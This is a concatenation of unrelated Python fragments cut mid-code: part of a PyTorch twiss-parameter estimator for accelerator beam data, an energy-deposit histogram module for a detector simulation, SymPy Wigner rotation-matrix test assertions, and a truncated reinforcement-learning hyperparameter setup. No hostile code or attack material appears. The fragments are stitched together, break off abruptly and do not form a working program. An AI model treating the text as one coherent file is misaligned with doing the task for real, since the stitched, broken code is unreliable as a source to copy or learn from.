count = torch.tensor([limit*(2*limit - 1) for limit in range(1, max(self.limit) + 1)], dtype=torch.int64, device=self.device)
limit_min, limit_max = self.limit
if limit_min == limit_max:
count = count[:limit_max]
*_, count_max = count
mask = mask[:, :count_max]
if limit_min < limit_max:
count = count[limit_min - 1:limit_max]
count_min, *_, count_max = count
mask = mask[:, count_min:count_max]
return mask
def mask_location(self, table:list) -> torch.Tensor:
"""
Generate weight mask based on given range limit.
Parameters
----------
table: list
list of locations to remove
Returns
-------
weight mask (torch.Tensor)
"""
size, length, *_ = self.combo.shape
mask = torch.zeros((size, length), dtype=torch.int64, device=self.device)
for location in table:
_, other = self.index.swapaxes(0, -1)
other = torch.mul(*(other != location).swapaxes(0, 1)).T
mask = (mask == other)
return mask.logical_not()
def mask_distance(self, function) -> torch.Tensor:
"""
Generate weight mask based on given range limit.
Parameters
----------
function: Callable
function to apply to distance data
Returns
-------
weight mask (torch.Tensor)
"""
mask = torch.stack([function(distance) for distance in self.distance])
mask = torch.stack([mask for _ in range(self.size)])
return mask
def process_twiss(self, plane:str='x', *,
weight:bool=True, mask:torch.Tensor=None) -> dict:
"""
Process twiss data.
Parameters
----------
plane: str
data plane ('x' or 'y')
weight: bool
flag to use weights
mask: torch.Tensor
mask
Returns
-------
twiss data (dict)
dict_keys(['value_a', 'sigma_a', 'error_a', 'value_b', 'sigma_b', 'error_b'])
"""
result = {}
if mask == None:
size, length, *_ = self.index.shape
mask = torch.ones((size, length), device=self.device).to(torch.bool)
if plane == 'x':
a, sigma_a, a_m = self.data_phase['ax'], self.data_phase['sigma_ax'], self.model.ax
b, sigma_b, b_m = self.data_phase['bx'], self.data_phase['sigma_bx'], self.model.bx
if plane == 'y':
a, sigma_a, a_m = self.data_phase['ay'], self.data_phase['sigma_ay'], self.model.ay
b, sigma_b, b_m = self.data_phase['by'], self.data_phase['sigma_by'], self.model.by
if not weight:
center = weighted_mean(a, weight=mask)
spread = weighted_variance(a, weight=mask, center=center).sqrt()
result['value_a'] = center
result['sigma_a'] = spread
result['error_a'] = (center - a_m)/a_m
center = weighted_mean(b, weight=mask)
spread = weighted_variance(b, weight=mask, center=center).sqrt()
result['value_b'] = center
result['sigma_b'] = spread
result['error_b'] = (center - b_m)/b_m
return result
weight = (mask.to(self.dtype)/sigma_a**2).nan_to_num(posinf=0.0, neginf=0.0)
center = weighted_mean(a, weight=weight)
spread = weighted_variance(a, weight=weight, center=center).sqrt()
result['value_a'] = center
result['sigma_a'] = spread
result['error_a'] = (center - a_m)/a_m
weight = (mask.to(self.dtype)/sigma_b**2).nan_to_num(posinf=0.0, neginf=0.0)
center = weighted_mean(b, weight=weight)
spread = weighted_variance(b, weight=weight, center=center).sqrt()
result['value_b'] = center
result['sigma_b'] = spread
result['error_b'] = (center - b_m)/b_m
if plane == 'x':
self.ax, self.sigma_ax = result['value_a'], result['sigma_a']
self.bx, self.sigma_bx = result['value_b'], result['sigma_b']
if plane == 'y':
self.ay, self.sigma_ay = result['value_a'], result['sigma_a']
self.by, self.sigma_by = result['value_b'], result['sigma_b']
return result
def get_twiss_from_data(self, n:int, x:torch.Tensor, y:torch.Tensor, *,
refit:bool=False, factor:float=5.0,
level:float=1.0E-6, sigma_x:torch.Tensor=None, sigma_y:torch.Tensor=None,
ax:torch.Tensor=None, bx:torch.Tensor=None, ay:torch.Tensor=None, by:torch.Tensor=None,
transport:torch.Tensor=None, **kwargs) -> dict:
"""
Estimate twiss from tbt data using ODR fit.
Note, if no initial guesses for twiss and/or transport are given, model values will be used
This method is sensitive to noise and calibration errors
Parameters
----------
n: int
number of turns to use
x: torch.Tensor
x data
y: torch.Tensor
y data
refit: bool
flag to refit twiss using estimated invariants
factor: float
threshold factor for invariants spread
level: float
default noise level
sigma_x: torch.Tensor
x noise sigma for each signal
sigma_y: torch.Tensor
y noise sigma for each signal
ax, bx, ay, by: torch.Tensor
initial guess for twiss parameters at monitor locations
transport: torch.Tensor
transport matrices between monitor locations
Returns
-------
fit result (dict)
dict_keys(['jx', 'ax', 'bx', 'sigma_jx', 'sigma_ax', 'sigma_bx', 'jy', 'ay', 'by', 'sigma_jy', 'sigma_ay', 'sigma_by', 'mux', 'muy'])
"""
if ax is None:
ax = self.model.ax[self.model.monitor_index].cpu().numpy()
else:
ax = ax.cpu().numpy()
if bx is None:
bx = self.model.bx[self.model.monitor_index].cpu().numpy()
else:
bx = bx.cpu().numpy()
if ay is None:
ay = | |
<filename>analysis/calc.py
"""Energy calculations and histograms."""
import abc
import collections
import datetime
import functools
import itertools
import math
import os
import pickle
import warnings
import numpy
import pandas
from matplotlib import pyplot
# Use seaborn's plotting styles.
try:
import seaborn
seaborn.set()
except ModuleNotFoundError:
msg = "Seaborn wasn't found."
warnings.warn(msg)
# Energy-z histogram z-limits for the 8 by 4 plate arrangements. The
# z-limits for other plate arrangements are adjusted in increments equal
# to the `_plate_separation`.
_z_lims_8_4 = (-65, 95)
_plate_separation = 4.15 + 3.5
# Energy-z histogram energy-limits.
_e_lims_200 = (0, 400) # for 200 GeV
_e_lims_350 = (0, 650) # for 350 GeV
_tube_e_lims_200 = tuple(lim / 25 for lim in _e_lims_200)
_tube_e_lims_350 = tuple(lim / 25 for lim in _e_lims_350)
_default_bin_density = 10
_default_dpi = 300
_default_length_units = 'mm'
_default_energy_units = 'MeV'
# Just used to split energy-z plots.
_PEEK_z_lims = (-43.5 / 2, 43.5 / 2)
_default_tube_z_lims = (-35 / 2, 35 / 2)
# Convert the _default_middle_z_lims to integers so that the plot
# tick labels are displayed without decimals.
_default_middle_z_lims = tuple(int(lim) for lim in (-8 / 2, 8 / 2))
_default_xy_lims = 2 * ((-3, 3),)
_default_xy_hist_z_lims = _default_middle_z_lims
_image_format = 'jpg'
_data_format = 'csv'
linewidth = 0.5
class Calc(abc.ABC):
"""
A base for calculations and presentations of results a certain
kind.
Attributes:
resultss: A collection of the results. It is a pandas DataFrame
in this base class, but that can change.
piece: Piece of analysis that this calculation is for.
save_dir: Save output in this folder.
save_name: A name for the saved files.
"""
def __init__(self, piece):
self._piece = piece
self.resultss = pandas.DataFrame()
if self._piece.out_dir:
# Save when Piece has an output directory.
self.save_dir = self._piece.out_dir
self.save_name = self._piece.name
else:
self.save_dir = None
self.save_name = None
def __repr__(self):
return repr(self.resultss)
def get(self, i=None):
"""
Get the ith set of results, or if i isn't given, make sure
resultss contains only one entry and return it.
:param i: The index of the results to get.
:type i: int or None
:return: Results.
:rtype:
"""
if i is None:
self._assert_single_entry()
return self.resultss.loc[0]
return self.resultss.loc[i]
def add_data(self, data):
"""
Calculate results from data and keep them.
:param data: Hits data.
:type data: pandas.DataFrame
:return:
:rtype:
"""
self.add_results(self._data2results(data))
def add_results(self, results):
"""
Keep some already calculated results (after making sure they are
good results).
:param results: Results to add.
:type results: pandas.Series or dict or collections.OrderedDict
:return:
:rtype: None
"""
self._check_results(results)
self.resultss = _ordered_append(self.resultss, results)
def save(self):
"""
Save results to a csv file if save_dir is set.
:return: Path to saved results file.
:rtype: str
"""
if not self.save_dir:
return None
filename = '.'.join((self.save_name, _data_format))
filepath = os.path.join(self.save_dir, filename)
return save_dataframe(self.resultss, filepath)
def pickle_save(self, filepath=None):
"""Save self in a pickle format. Does nothing if `filepath`
isn't given and `self.save_dir` is not set.
:param filepath: Location to save. If not given, use
`self.save_dir`.
"""
if not filepath:
if not self.save_dir:
return
filepath = os.path.join(self.save_dir, self.save_name + '.p')
with open(filepath, 'wb') as file:
pickle.dump(self, file)
def _assert_single_entry(self):
"""Make sure only one set of results has been added."""
assert len(self.resultss) == 1, \
"This Calc container does not have a single entry."
def _assert_multiple_entries(self):
"""Make sure more than one set of results has been added."""
assert len(self.resultss) > 1, \
"This Calc container does not have more than one set of" \
" results."
def _assert_nonempty(self):
"""Make sure at least one set of results has been added."""
assert len(self.resultss) >= 1, \
"This Calc container is empty."
@abc.abstractmethod
def _data2results(self, data):
"""
Calculate results from hits data and return them.
:param data: Hits data.
:return: Calc results.
"""
@abc.abstractmethod
def _check_results(self, results):
"""Make sure some calculated results are good to keep."""
class Numbers(Calc):
"""
The numbers don't lie.
This class manages calculations of different numbers from the data
and writes them to files.
"""
def add_data(self, data, tags=None):
self.add_results(self._data2results(data, tags))
def append_mean_and_uncertainties(
self, mean_tags=None, std_tags=None, sem_tags=None
):
"""
Append mean, standard deviation and standard error entries to
the collection of results.
:param mean_tags: Tags to use for the new means entry.
:type mean_tags: dict or collections.OrderedDict or None
:param std_tags: Tags to use for the new standard deviation
entry.
:type std_tags: dict or collections.OrderedDict or None
:param sem_tags: Tags to use for the new standard error in the
mean entry.
:type sem_tags: dict or collections.OrderedDict or None
:return: The new mean, standard deviation, and standard error.
:rtype:
"""
# Pandas' std function gives NANs for DataFrames with only one
# entry.
self._assert_multiple_entries()
new_rows = [self.resultss.mean(), self.resultss.std()]
new_rows.append( # standard error
new_rows[1] / math.sqrt(len(self.resultss))
)
for i, tags in enumerate((mean_tags, std_tags, sem_tags)):
if tags:
new_rows[i] = pandas.Series(tags).combine_first(new_rows[i])
self.add_results(new_rows[i])
return new_rows
def _data2results(self, data, tags=None):
"""
:param data:
:type data:
:param tags: Extra result values for tagging an entry (e.g. with
its event and run).
:type tags: dict or collections.OrderedDict or None
:return:
:rtype:
"""
new_results = collections.OrderedDict()
if tags:
new_results.update(tags)
new_results.update(self.__split_z(data))
return new_results
def _check_results(self, results):
assert len(results) <= 9, "Tried to add funny results."
@staticmethod
def __split_z(data):
"""
Calculate energy deposit mean and std dev on sections of
data split up along z.
:param data: Hits data.
:type data: pandas.DataFrame
:return: Calculation results.
:rtype: dict
"""
tube_indices = numpy.logical_and(
_default_tube_z_lims[0] <= data.z,
data.z <= _default_tube_z_lims[1]
)
middle_indices = numpy.logical_and(
_default_middle_z_lims[0] <= data.z,
data.z <= _default_middle_z_lims[1]
)
return {
'full_e_dep':
data.energy_deposit.sum(),
'tube_e_dep':
data.energy_deposit[tube_indices].sum(),
'middle_e_dep':
data.energy_deposit[middle_indices].sum(),
}
@staticmethod
def __tubes(data):
"""TODO: Document and organize this."""
offset = 7.5 / 4
# TODO: Change default to self (probably don't need to do this).
data = data[numpy.logical_and(
_default_middle_z_lims[0] < data.z,
data.z < _default_middle_z_lims[1]
)]
bottom = data.y <= 0
top = data.y > 0
bottom_left = numpy.logical_and(bottom, data.x <= -offset)
bottom_right = numpy.logical_and(bottom, data.x > -offset)
top_left = numpy.logical_and(top, data.x <= offset)
top_right = numpy.logical_and(top, data.x > offset)
bottom_left_sum = data.energy_deposit[bottom_left].sum()
bottom_right_sum = data.energy_deposit[bottom_right].sum()
top_left_sum = data.energy_deposit[top_left].sum()
top_right_sum = data.energy_deposit[top_right].sum()
return {
'top_right': top_right_sum,
'top_left': top_left_sum,
'bottom_left': bottom_left_sum,
'bottom_right': bottom_right_sum
}
class Histogram(Calc):
"""
Base histogram.
Attributes:
bin_density: E.g. bins per mm.
dpi: Dots per inch for images.
title: The plot title.
TODO: Add the option to close all the plot figures created.
"""
def __init__(
self,
piece,
title=None,
bin_density=None,
dpi=None,
energy_units=None,
length_units=None
):
super().__init__(piece)
# Attributes with defaults.
self.title = title or self._default_title
self.bin_density = bin_density or _default_bin_density
self.dpi = dpi or _default_dpi
self.energy_units = energy_units or _default_energy_units
self.length_units = length_units or _default_length_units
def save_fig(self, fig, file_suffix):
"""
Save a figure to a new file if save_dir is set.
:param fig: The figure to save.
:type fig: figure
:param file_suffix: Added to the end of the saved filename.
:type file_suffix: str or None
:return: File path of the saved figure.
:rtype: str
"""
if not self.save_dir:
return None
if file_suffix:
save_name = '-'.join((self.save_name, file_suffix))
else:
save_name = self.save_name
filename = '.'.join((save_name, _image_format))
filepath = os.path.join(self.save_dir, filename)
fig.savefig(
filepath, dpi=self.dpi, format=_image_format, bbox_inches='tight'
)
return filepath
def _to_density(self, sums):
"""
Convert values from units of energy/bin to units of
energy/distance.
:param sums: Values to convert.
:type sums: numpy.ndarray
:return: Converted values.
:rtype: numpy.ndarray
"""
return sums * self.bin_density
@property
def _default_title(self):
"""Default plot title."""
raise NotImplementedError
@abc.abstractmethod
def plot_single(self, i=None, save=True):
"""
Plot the ith set of sums. If i isn't given, assume there is only
set of sums and plot it.
:param save: Save to file with the standard filename if True.
:type save: bool
:param i: Index of the sums.
:type i: int
:return: New figure and axis/axes.
:rtype: tuple
"""
@abc.abstractmethod
def plot_means(self):
"""
Plot the mean, and maybe the standard deviation, of all results.
:return: New figure and axis/axes.
:rtype: tuple
"""
@abc.abstractmethod
def _make_fig_and_axes(self):
"""
Make a new labeled figure and axis/axes.
:return: The figure and axis/axes.
:rtype: tuple
"""
class EnergyVsZ(Histogram):
"""
Histograms of energy deposit vs. z.
Attributes:
e_lims: Overall energy/y-axis limits.
tube_e_lims: Tube energy/y-axis limits.
z_lims: Overall z limits.
tube_z_lims: Tube z limits.
middle_z_lims: Tube middle section z limits.
"""
_default_title = 'Energy vs. z.'
def __init__(
self,
piece,
title=None,
e_lims=None,
tube_e_lims=None,
z_lims=None,
tube_z_lims=None,
middle_z_lims=None,
**kwargs
):
super().__init__(piece, title, **kwargs)
# | |
== -1/2
assert Rotation.d(2, 2, -2, pi/2).doit() == 1/4
assert Rotation.d(2, 1, 2, pi/2).doit() == 1/2
assert Rotation.d(2, 1, 1, pi/2).doit() == -1/2
assert Rotation.d(2, 1, 0, pi/2).doit() == 0
assert Rotation.d(2, 1, -1, pi/2).doit() == 1/2
assert Rotation.d(2, 1, -2, pi/2).doit() == -1/2
assert Rotation.d(2, 0, 2, pi/2).doit() == sqrt(6)/4
assert Rotation.d(2, 0, 1, pi/2).doit() == 0
assert Rotation.d(2, 0, 0, pi/2).doit() == -1/2
assert Rotation.d(2, 0, -1, pi/2).doit() == 0
assert Rotation.d(2, 0, -2, pi/2).doit() == sqrt(6)/4
assert Rotation.d(2, -1, 2, pi/2).doit() == 1/2
assert Rotation.d(2, -1, 1, pi/2).doit() == 1/2
assert Rotation.d(2, -1, 0, pi/2).doit() == 0
assert Rotation.d(2, -1, -1, pi/2).doit() == -1/2
assert Rotation.d(2, -1, -2, pi/2).doit() == -1/2
assert Rotation.d(2, -2, 2, pi/2).doit() == 1/4
assert Rotation.d(2, -2, 1, pi/2).doit() == 1/2
assert Rotation.d(2, -2, 0, pi/2).doit() == sqrt(6)/4
assert Rotation.d(2, -2, -1, pi/2).doit() == 1/2
assert Rotation.d(2, -2, -2, pi/2).doit() == 1/4
def test_rotation_d():
# Symbolic tests
# j = 1/2
assert Rotation.D(S(1)/2, S(1)/2, S(1)/2, alpha, beta, gamma).doit() == \
cos(beta/2)*exp(-I*alpha/2)*exp(-I*gamma/2)
assert Rotation.D(S(1)/2, S(1)/2, -S(1)/2, alpha, beta, gamma).doit() == \
-sin(beta/2)*exp(-I*alpha/2)*exp(I*gamma/2)
assert Rotation.D(S(1)/2, -S(1)/2, S(1)/2, alpha, beta, gamma).doit() == \
sin(beta/2)*exp(I*alpha/2)*exp(-I*gamma/2)
assert Rotation.D(S(1)/2, -S(1)/2, -S(1)/2, alpha, beta, gamma).doit() == \
cos(beta/2)*exp(I*alpha/2)*exp(I*gamma/2)
# j = 1
assert Rotation.D(1, 1, 1, alpha, beta, gamma).doit() == \
(1 + cos(beta))/2*exp(-I*alpha)*exp(-I*gamma)
assert Rotation.D(1, 1, 0, alpha, beta, gamma).doit() == -sin(
beta)/sqrt(2)*exp(-I*alpha)
assert Rotation.D(1, 1, -1, alpha, beta, gamma).doit() == \
(1 - cos(beta))/2*exp(-I*alpha)*exp(I*gamma)
assert Rotation.D(1, 0, 1, alpha, beta, gamma).doit() == \
sin(beta)/sqrt(2)*exp(-I*gamma)
assert Rotation.D(1, 0, 0, alpha, beta, gamma).doit() == cos(beta)
assert Rotation.D(1, 0, -1, alpha, beta, gamma).doit() == \
-sin(beta)/sqrt(2)*exp(I*gamma)
assert Rotation.D(1, -1, 1, alpha, beta, gamma).doit() == \
(1 - cos(beta))/2*exp(I*alpha)*exp(-I*gamma)
assert Rotation.D(1, -1, 0, alpha, beta, gamma).doit() == \
sin(beta)/sqrt(2)*exp(I*alpha)
assert Rotation.D(1, -1, -1, alpha, beta, gamma).doit() == \
(1 + cos(beta))/2*exp(I*alpha)*exp(I*gamma)
# j = 3/2
assert Rotation.D(S(3)/2, S(3)/2, S(3)/2, alpha, beta, gamma).doit() == \
(3*cos(beta/2) + cos(3*beta/2))/4*exp(-3*I*alpha/2)*exp(-3*I*gamma/2)
assert Rotation.D(S(3)/2, S(3)/2, S(1)/2, alpha, beta, gamma).doit() == \
-sqrt(3)*(sin(beta/2) + sin(3*beta/2))/4*exp(-3*I*alpha/2)*exp(-I*gamma/2)
assert Rotation.D(S(3)/2, S(3)/2, -S(1)/2, alpha, beta, gamma).doit() == \
sqrt(3)*(cos(beta/2) - cos(3*beta/2))/4*exp(-3*I*alpha/2)*exp(I*gamma/2)
assert Rotation.D(S(3)/2, S(3)/2, -S(3)/2, alpha, beta, gamma).doit() == \
(-3*sin(beta/2) + sin(3*beta/2))/4*exp(-3*I*alpha/2)*exp(3*I*gamma/2)
assert Rotation.D(S(3)/2, S(1)/2, S(3)/2, alpha, beta, gamma).doit() == \
sqrt(3)*(sin(beta/2) + sin(3*beta/2))/4*exp(-I*alpha/2)*exp(-3*I*gamma/2)
assert Rotation.D(S(3)/2, S(1)/2, S(1)/2, alpha, beta, gamma).doit() == \
(cos(beta/2) + 3*cos(3*beta/2))/4*exp(-I*alpha/2)*exp(-I*gamma/2)
assert Rotation.D(S(3)/2, S(1)/2, -S(1)/2, alpha, beta, gamma).doit() == \
(sin(beta/2) - 3*sin(3*beta/2))/4*exp(-I*alpha/2)*exp(I*gamma/2)
assert Rotation.D(S(3)/2, S(1)/2, -S(3)/2, alpha, beta, gamma).doit() == \
sqrt(3)*(cos(beta/2) - cos(3*beta/2))/4*exp(-I*alpha/2)*exp(3*I*gamma/2)
assert Rotation.D(S(3)/2, -S(1)/2, S(3)/2, alpha, beta, gamma).doit() == \
sqrt(3)*(cos(beta/2) - cos(3*beta/2))/4*exp(I*alpha/2)*exp(-3*I*gamma/2)
assert Rotation.D(S(3)/2, -S(1)/2, S(1)/2, alpha, beta, gamma).doit() == \
(-sin(beta/2) + 3*sin(3*beta/2))/4*exp(I*alpha/2)*exp(-I*gamma/2)
assert Rotation.D(S(3)/2, -S(1)/2, -S(1)/2, alpha, beta, gamma).doit() == \
(cos(beta/2) + 3*cos(3*beta/2))/4*exp(I*alpha/2)*exp(I*gamma/2)
assert Rotation.D(S(3)/2, -S(1)/2, -S(3)/2, alpha, beta, gamma).doit() == \
-sqrt(3)*(sin(beta/2) + sin(3*beta/2))/4*exp(I*alpha/2)*exp(3*I*gamma/2)
assert Rotation.D(S(3)/2, -S(3)/2, S(3)/2, alpha, beta, gamma).doit() == \
(3*sin(beta/2) - sin(3*beta/2))/4*exp(3*I*alpha/2)*exp(-3*I*gamma/2)
assert Rotation.D(S(3)/2, -S(3)/2, S(1)/2, alpha, beta, gamma).doit() == \
sqrt(3)*(cos(beta/2) - cos(3*beta/2))/4*exp(3*I*alpha/2)*exp(-I*gamma/2)
assert Rotation.D(S(3)/2, -S(3)/2, -S(1)/2, alpha, beta, gamma).doit() == \
sqrt(3)*(sin(beta/2) + sin(3*beta/2))/4*exp(3*I*alpha/2)*exp(I*gamma/2)
assert Rotation.D(S(3)/2, -S(3)/2, -S(3)/2, alpha, beta, gamma).doit() == \
(3*cos(beta/2) + cos(3*beta/2))/4*exp(3*I*alpha/2)*exp(3*I*gamma/2)
# j = 2
assert Rotation.D(2, 2, 2, alpha, beta, gamma).doit() == \
(3 + 4*cos(beta) + cos(2*beta))/8*exp(-2*I*alpha)*exp(-2*I*gamma)
assert Rotation.D(2, 2, 1, alpha, beta, gamma).doit() == \
-((cos(beta) + 1)*exp(-2*I*alpha)*exp(-I*gamma)*sin(beta))/2
assert Rotation.D(2, 2, 0, alpha, beta, gamma).doit() == \
sqrt(6)*sin(beta)**2/4*exp(-2*I*alpha)
assert Rotation.D(2, 2, -1, alpha, beta, gamma).doit() == \
(cos(beta) - 1)*sin(beta)/2*exp(-2*I*alpha)*exp(I*gamma)
assert Rotation.D(2, 2, -2, alpha, beta, gamma).doit() == \
(3 - 4*cos(beta) + cos(2*beta))/8*exp(-2*I*alpha)*exp(2*I*gamma)
assert Rotation.D(2, 1, 2, alpha, beta, gamma).doit() == \
(cos(beta) + 1)*sin(beta)/2*exp(-I*alpha)*exp(-2*I*gamma)
assert Rotation.D(2, 1, 1, alpha, beta, gamma).doit() == \
(cos(beta) + cos(2*beta))/2*exp(-I*alpha)*exp(-I*gamma)
assert Rotation.D(2, 1, 0, alpha, beta, gamma).doit() == -sqrt(6)* \
sin(2*beta)/4*exp(-I*alpha)
assert Rotation.D(2, 1, -1, alpha, beta, gamma).doit() == \
(cos(beta) - cos(2*beta))/2*exp(-I*alpha)*exp(I*gamma)
assert Rotation.D(2, 1, -2, alpha, beta, gamma).doit() == \
(cos(beta) - 1)*sin(beta)/2*exp(-I*alpha)*exp(2*I*gamma)
assert Rotation.D(2, 0, 2, alpha, beta, gamma).doit() == \
sqrt(6)*sin(beta)**2/4*exp(-2*I*gamma)
assert Rotation.D(2, 0, 1, alpha, beta, gamma).doit() == sqrt(6)* \
sin(2*beta)/4*exp(-I*gamma)
assert Rotation.D(
2, 0, 0, alpha, beta, gamma).doit() == (1 + 3*cos(2*beta))/4
assert Rotation.D(2, 0, -1, alpha, beta, gamma).doit() == -sqrt(6)* \
sin(2*beta)/4*exp(I*gamma)
assert Rotation.D(2, 0, -2, alpha, beta, gamma).doit() == \
sqrt(6)*sin(beta)**2/4*exp(2*I*gamma)
assert Rotation.D(2, -1, 2, alpha, beta, gamma).doit() == \
(2*sin(beta) - sin(2*beta))/4*exp(I*alpha)*exp(-2*I*gamma)
assert Rotation.D(2, -1, 1, alpha, beta, gamma).doit() == \
(cos(beta) - cos(2*beta))/2*exp(I*alpha)*exp(-I*gamma)
assert Rotation.D(2, -1, 0, alpha, beta, gamma).doit() == sqrt(6)* \
sin(2*beta)/4*exp(I*alpha)
assert Rotation.D(2, -1, -1, alpha, beta, gamma).doit() == \
(cos(beta) + cos(2*beta))/2*exp(I*alpha)*exp(I*gamma)
assert Rotation.D(2, -1, -2, alpha, beta, gamma).doit() == \
-((cos(beta) + 1)*sin(beta))/2*exp(I*alpha)*exp(2*I*gamma)
assert Rotation.D(2, -2, 2, alpha, beta, gamma).doit() == \
(3 - 4*cos(beta) + cos(2*beta))/8*exp(2*I*alpha)*exp(-2*I*gamma)
assert Rotation.D(2, -2, 1, alpha, beta, gamma).doit() == \
(2*sin(beta) - sin(2*beta))/4*exp(2*I*alpha)*exp(-I*gamma)
assert Rotation.D(2, -2, 0, alpha, beta, gamma).doit() == \
sqrt(6)*sin(beta)**2/4*exp(2*I*alpha)
assert Rotation.D(2, -2, -1, alpha, beta, gamma).doit() == \
(cos(beta) + 1)*sin(beta)/2*exp(2*I*alpha)*exp(I*gamma)
assert Rotation.D(2, -2, -2, alpha, beta, gamma).doit() == \
(3 + 4*cos(beta) + cos(2*beta))/8*exp(2*I*alpha)*exp(2*I*gamma)
# Numerical tests
# j = 1/2
assert Rotation.D(
S(1)/2, S(1)/2, S(1)/2, pi/2, pi/2, pi/2).doit() == -I*sqrt(2)/2
assert Rotation.D(
S(1)/2, S(1)/2, -S(1)/2, pi/2, pi/2, pi/2).doit() == -sqrt(2)/2
assert Rotation.D(
S(1)/2, -S(1)/2, S(1)/2, pi/2, pi/2, pi/2).doit() == sqrt(2)/2
assert Rotation.D(
S(1)/2, -S(1)/2, -S(1)/2, pi/2, pi/2, pi/2).doit() == I*sqrt(2)/2
# j = 1
assert Rotation.D(1, 1, 1, pi/2, pi/2, pi/2).doit() == -1/2
assert Rotation.D(1, 1, 0, pi/2, pi/2, pi/2).doit() == I*sqrt(2)/2
assert Rotation.D(1, 1, -1, pi/2, pi/2, pi/2).doit() == 1/2
assert Rotation.D(1, 0, 1, pi/2, pi/2, pi/2).doit() == -I*sqrt(2)/2
assert Rotation.D(1, 0, 0, pi/2, pi/2, pi/2).doit() == 0
assert Rotation.D(1, 0, -1, pi/2, pi/2, pi/2).doit() == -I*sqrt(2)/2
assert Rotation.D(1, -1, 1, pi/2, pi/2, pi/2).doit() == 1/2
assert Rotation.D(1, -1, 0, pi/2, pi/2, pi/2).doit() == I*sqrt(2)/2
assert Rotation.D(1, -1, -1, pi/2, pi/2, pi/2).doit() == -1/2
# j = 3/2
assert Rotation.D(
S(3)/2, S(3)/2, S(3)/2, pi/2, pi/2, pi/2).doit() == I*sqrt(2)/4
assert Rotation.D(
S(3)/2, S(3)/2, S(1)/2, pi/2, pi/2, pi/2).doit() == sqrt(6)/4
assert Rotation.D(
S(3)/2, S(3)/2, -S(1)/2, pi/2, pi/2, pi/2).doit() == -I*sqrt(6)/4
assert Rotation.D(
S(3)/2, S(3)/2, -S(3)/2, pi/2, pi/2, pi/2).doit() == -sqrt(2)/4
assert Rotation.D(
S(3)/2, S(1)/2, S(3)/2, pi/2, pi/2, pi/2).doit() == -sqrt(6)/4
assert Rotation.D(
S(3)/2, S(1)/2, S(1)/2, pi/2, pi/2, pi/2).doit() == I*sqrt(2)/4
assert Rotation.D(
S(3)/2, S(1)/2, -S(1)/2, pi/2, pi/2, pi/2).doit() == -sqrt(2)/4
assert Rotation.D(
S(3)/2, S(1)/2, -S(3)/2, pi/2, pi/2, pi/2).doit() == I*sqrt(6)/4
assert Rotation.D(
S(3)/2, -S(1)/2, S(3)/2, pi/2, pi/2, pi/2).doit() == -I*sqrt(6)/4
assert Rotation.D(
S(3)/2, -S(1)/2, S(1)/2, pi/2, pi/2, pi/2).doit() == sqrt(2)/4
assert Rotation.D(
S(3)/2, -S(1)/2, -S(1)/2, pi/2, pi/2, pi/2).doit() == -I*sqrt(2)/4
assert Rotation.D(
S(3)/2, -S(1)/2, -S(3)/2, pi/2, pi/2, pi/2).doit() == sqrt(6)/4
assert Rotation.D(
S(3)/2, -S(3)/2, S(3)/2, pi/2, pi/2, pi/2).doit() == sqrt(2)/4
assert Rotation.D(
S(3)/2, -S(3)/2, S(1)/2, pi/2, pi/2, pi/2).doit() == I*sqrt(6)/4
assert Rotation.D(
S(3)/2, -S(3)/2, -S(1)/2, pi/2, pi/2, pi/2).doit() == -sqrt(6)/4
assert Rotation.D(
S(3)/2, -S(3)/2, -S(3)/2, pi/2, pi/2, pi/2).doit() == -I*sqrt(2)/4
# j = 2
assert Rotation.D(2, 2, 2, pi/2, pi/2, pi/2).doit() == 1/4
assert Rotation.D(2, 2, 1, pi/2, pi/2, pi/2).doit() == -I/2
assert Rotation.D(2, 2, 0, pi/2, pi/2, pi/2).doit() == -sqrt(6)/4
assert Rotation.D(2, 2, -1, pi/2, pi/2, pi/2).doit() == I/2
assert Rotation.D(2, 2, -2, pi/2, pi/2, pi/2).doit() == 1/4
assert Rotation.D(2, 1, 2, pi/2, pi/2, pi/2).doit() == I/2
assert Rotation.D(2, 1, 1, pi/2, pi/2, pi/2).doit() == 1/2
assert Rotation.D(2, 1, 0, pi/2, pi/2, pi/2).doit() == 0
assert Rotation.D(2, 1, -1, pi/2, pi/2, pi/2).doit() == 1/2
assert Rotation.D(2, 1, -2, pi/2, pi/2, pi/2).doit() == -I/2
assert Rotation.D(2, 0, 2, pi/2, pi/2, pi/2).doit() == -sqrt(6)/4
assert Rotation.D(2, 0, 1, pi/2, pi/2, pi/2).doit() == 0
assert Rotation.D(2, 0, 0, pi/2, pi/2, pi/2).doit() == -1/2
assert Rotation.D(2, 0, -1, pi/2, pi/2, pi/2).doit() == 0
assert Rotation.D(2, 0, -2, pi/2, pi/2, pi/2).doit() == -sqrt(6)/4
assert Rotation.D(2, -1, 2, pi/2, pi/2, pi/2).doit() == -I/2
assert Rotation.D(2, -1, 1, pi/2, pi/2, pi/2).doit() == 1/2
assert Rotation.D(2, -1, 0, pi/2, pi/2, pi/2).doit() == 0
assert Rotation.D(2, -1, -1, pi/2, pi/2, pi/2).doit() == 1/2
assert Rotation.D(2, -1, -2, pi/2, pi/2, pi/2).doit() == I/2
assert Rotation.D(2, -2, 2, pi/2, pi/2, | |
"""
Parameters
----------
info_MDP: This is an object of Class mushroom_rl.environment.MDPInfo. It contains the action and observation spaces,
gamma and the horizon of the MDP.
Returns
-------
This method returns True if the algo_params were set successfully, and False otherwise.
"""
self.info_MDP = info_MDP
if(self.algo_params is None):
policy_class = Categorical(hp_name='policy_class', obj_name='policy_class_'+str(self.model.__name__),
current_actual_value=OrnsteinUhlenbeckPolicy)
sigma = Real(hp_name='sigma', current_actual_value=0.2, obj_name='sigma_'+str(self.model.__name__))
theta = Real(hp_name='theta', current_actual_value=0.15, obj_name='theta_'+str(self.model.__name__))
dt = Real(hp_name='dt', current_actual_value=1e-2, obj_name='dt_'+str(self.model.__name__))
critic, actor = self._default_network()
#actor:
actor_network = Categorical(hp_name='actor_network', obj_name='actor_network_'+str(self.model.__name__),
current_actual_value=actor)
actor_class = Categorical(hp_name='actor_class', obj_name='actor_class_'+str(self.model.__name__),
current_actual_value=optim.Adam)
actor_lr = Real(hp_name='actor_lr', obj_name='actor_lr_'+str(self.model.__name__),
current_actual_value=1e-3, range_of_values=[1e-5, 1e-3], to_mutate=True, seeder=self.seeder,
log_mode=self.log_mode, checkpoint_log_path=self.checkpoint_log_path, verbosity=self.verbosity)
#critic:
critic_network = Categorical(hp_name='critic_network', obj_name='critic_network_'+str(self.model.__name__),
current_actual_value=critic)
critic_class = Categorical(hp_name='critic_class', obj_name='critic_class_'+str(self.model.__name__),
current_actual_value=optim.Adam)
